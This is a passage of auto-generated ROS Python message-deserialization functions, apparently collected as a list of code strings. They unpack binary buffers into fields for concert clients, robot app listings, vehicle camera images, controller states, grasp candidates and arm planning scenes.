rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v56 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v56.resource_name = str[start:end].decode('utf-8')\n else:\n _v56.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v56.format = str[start:end].decode('utf-8')\n else:\n _v56.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v56.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.available.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.missing = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v57 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.name = str[start:end].decode('utf-8')\n else:\n _v57.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v57.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.description = str[start:end].decode('utf-8')\n else:\n _v57.description = str[start:end]\n _v58 = _v57.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v58.resource_name = str[start:end].decode('utf-8')\n else:\n _v58.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v58.format = str[start:end].decode('utf-8')\n else:\n _v58.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v58.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.version = str[start:end].decode('utf-8')\n else:\n _v57.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v59 = val1.conn_stats\n _x = _v59\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v59.gateway_available = bool(_v59.gateway_available)\n _v59.network_info_available = bool(_v59.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v60 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v60.resource_name = str[start:end].decode('utf-8')\n else:\n _v60.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v60.format = str[start:end].decode('utf-8')\n else:\n _v60.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v60.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.missing.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gone = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v61 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.name = str[start:end].decode('utf-8')\n else:\n _v61.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v61.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.description = str[start:end].decode('utf-8')\n else:\n _v61.description = str[start:end]\n _v62 = _v61.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v62.resource_name = str[start:end].decode('utf-8')\n else:\n _v62.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v62.format = str[start:end].decode('utf-8')\n else:\n _v62.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v62.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.version = str[start:end].decode('utf-8')\n else:\n _v61.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v63 = val1.conn_stats\n _x = _v63\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v63.gateway_available = bool(_v63.gateway_available)\n _v63.network_info_available = bool(_v63.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v64 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v64.resource_name = str[start:end].decode('utf-8')\n else:\n _v64.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v64.format = str[start:end].decode('utf-8')\n else:\n _v64.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v64.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.gone.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.image is None:\n self.image = autonavigation.msg.Image()\n end = 0\n _x = self\n start = end\n end += 29\n (_x.unique_key, _x.gps_week, _x.gps_millisecond, _x.video_id, _x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _struct_2IQB3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.image.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 212\n (_x.image.localPose.time, _x.image.localPose.dr_x, _x.image.localPose.dr_y, _x.image.localPose.dr_z, _x.image.localPose.dr_heading, _x.image.localPose.dr_roll, _x.image.localPose.dr_pitch, _x.image.localPose.lf_speed, _x.image.localPose.rf_speed, _x.image.localPose.lr_speed, _x.image.localPose.rr_speed, _x.image.localPose.rot_x, _x.image.localPose.rot_y, _x.image.localPose.rot_z, _x.image.localPose.acc_x, _x.image.localPose.acc_y, _x.image.localPose.acc_z, _x.image.localPose.batteryState, _x.image.localPose.batteryEnergy, _x.image.localPose.steer, _x.image.localPose.brake, _x.image.localPose.fuel, _x.image.localPose.trans, _x.image.localPose.VehicleState, _x.image.localPose.mode, _x.image.localPose.drStatus, _x.image.localPose.errorStatus, _x.image.localPose.emergency_flag, _x.image.localPose.hardswitch_on, _x.image.gpsPos.gps_flag, _x.image.gpsPos.gps_week, _x.image.gpsPos.gps_millisecond, _x.image.gpsPos.longitude, _x.image.gpsPos.laltitude, _x.image.gpsPos.gaussX, _x.image.gpsPos.gaussY, _x.image.gpsPos.height, _x.image.gpsPos.pitch, _x.image.gpsPos.roll, _x.image.gpsPos.azimuth, _x.image.gpsPos.northVelocity, _x.image.gpsPos.eastVelocity, _x.image.gpsPos.upVelocity, _x.image.gpsPos.positionStatus, _x.image.gpsPos.rot_x, _x.image.gpsPos.rot_y, _x.image.gpsPos.rot_z, _x.image.gpsPos.acc_x, _x.image.gpsPos.acc_y, _x.image.gpsPos.acc_z, _x.image.height, _x.image.width,) = _struct_d21i7bBI6d13i2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _struct_BI.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _from_cpp(self, str_msg, cls):\n msg = cls()\n result = msg.deserialize(str_msg)\n return result", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.planning_scene_diff is None:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n if self.operations is None:\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.joint_state.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.joint_state.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 8\n (_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v85 = val1.position\n _x = _v85\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v86 = val1.orientation\n _x = _v86\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.fixed_frame_transforms = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.TransformStamped()\n _v87 = val1.header\n start = end\n end += 4\n (_v87.seq,) = _struct_I.unpack(str[start:end])\n _v88 = _v87.stamp\n _x = _v88\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v87.frame_id = str[start:end].decode('utf-8')\n else:\n _v87.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.child_frame_id = str[start:end].decode('utf-8')\n else:\n val1.child_frame_id = str[start:end]\n _v89 = val1.transform\n _v90 = _v89.translation\n _x = _v90\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v91 = _v89.rotation\n _x = _v91\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.planning_scene_diff.fixed_frame_transforms.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_collision_matrix.link_names = []\n for i in range(0, length):\n start = end\n end += 4\n 